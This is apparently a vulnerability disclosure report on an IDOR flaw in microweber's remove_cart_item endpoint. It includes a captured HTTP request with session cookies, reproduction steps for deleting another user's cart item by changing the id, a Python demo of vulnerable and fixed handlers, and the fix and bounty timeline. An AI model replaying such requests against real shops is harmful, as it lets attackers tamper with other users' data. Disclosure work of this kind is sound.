Business Logic Errors in microweber/microweber


Reported on

Feb 18th 2022


I found an IDOR vulnerability where we are able to delete another user's product from the cart by the id parameter.

Steps to Reproduce:

  • First, add any product to the cart and check out.
  • On the checkout page, we can see the cart details, and we also have functionality to delete the product.
  • I sent the request to delete the product from the cart, and the request looks like this:


POST /demo/api/remove_cart_item HTTP/1.1
Cookie: back_to_admin=https%3A//; csrf-token-data=%7B%22value%22%3A%22ZTtOJvNj4GT9WO1hWUuTH8k51b55vLU8v7IbCauN%22%2C%22expiry%22%3A1645199386777%7D; mw-back-to-live-edit=true; show-sidebar-layouts=0; laravel_session=JfLYa02pKVNp14cHvEsEDfmcEPLtn9EuNGfViPTD; XSRF-TOKEN=ZTtOJvNj4GT9WO1hWUuTH8k51b55vLU8v7IbCauN
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 6
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

  • As you can see from the id parameter, we can assume that the victim's id is 144. When we change our value to the victim's id,
  • the product gets deleted from the victim's cart.


An attacker would be able to delete anybody's cart product without any user interaction.
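The root cause described in the report is an authorization gap: the removal endpoint acts on whatever item id the client supplies without checking that the item belongs to the caller's cart. The following is an added example (not microweber's code) showing that check in isolation: a constructed in-memory cart store, a handler that trusts the id as-is, and a hardened handler that only deletes items bound to the calling session. The item ids, session names and the `CartStore` / `CartItem` types are assumptions for illustration; only the victim id 144 comes from the report.

```python
"""Added example, not microweber code: ownership check for a cart-item
removal endpoint of the kind described in the report.

Assumptions (constructed for illustration): each cart item row carries the
id of the session that owns it, and the endpoint receives only the item id
from the client, as the captured request does.
"""
from dataclasses import dataclass, field


@dataclass
class CartItem:
    id: int
    session_id: str  # session that owns the item (constructed field)
    product: str


@dataclass
class CartStore:
    items: dict = field(default_factory=dict)

    def add(self, item: CartItem) -> None:
        self.items[item.id] = item

    def get(self, item_id: int):
        return self.items.get(item_id)

    def delete(self, item_id: int) -> bool:
        return self.items.pop(item_id, None) is not None


def remove_cart_item_vulnerable(store: CartStore, session_id: str, item_id: int) -> bool:
    """Deletes whichever row matches the client-supplied id.
    The calling session is never consulted, so any caller can remove any
    item: the insecure direct object reference the report describes."""
    return store.delete(item_id)


def remove_cart_item_fixed(store: CartStore, session_id: str, item_id: int) -> bool:
    """Deletes the row only if it belongs to the calling session.
    A foreign id gets the same False result as a non-existent one, so the
    response does not reveal which ids exist in other carts."""
    item = store.get(item_id)
    if item is None or item.session_id != session_id:
        return False
    return store.delete(item_id)


def build_store() -> CartStore:
    """Constructed sample data: one item per session, victim item id 144."""
    store = CartStore()
    store.add(CartItem(id=143, session_id="attacker-session", product="sticker"))
    store.add(CartItem(id=144, session_id="victim-session", product="laptop"))
    return store


def demo() -> dict:
    """Runs both handlers against the sample store and reports the outcome."""
    results = {}

    store = build_store()
    results["vulnerable_cross_session"] = remove_cart_item_vulnerable(store, "attacker-session", 144)
    results["vulnerable_victim_keeps_item"] = store.get(144) is not None

    store = build_store()
    results["fixed_cross_session"] = remove_cart_item_fixed(store, "attacker-session", 144)
    results["fixed_victim_keeps_item"] = store.get(144) is not None
    # The owner can still delete their own item through the fixed handler.
    results["fixed_own_item"] = remove_cart_item_fixed(store, "attacker-session", 143)
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The fixed handler scopes the lookup to the caller's own cart before deleting, which is the general remedy for this class of bug: resolve the object through the authenticated context rather than trusting a client-supplied identifier, and treat "exists but not yours" identically to "not found".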

We are processing your report and will contact the microweber team within 24 hours. 2 years ago
Peter Ivanov validated this vulnerability 2 years ago
nithissh200 has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov marked this as fixed in 1.2.11 with commit a41f0f 2 years ago
Peter Ivanov has been awarded the fix bounty
Peter Ivanov
2 years ago


This issue happens only if you are logged in as admin.

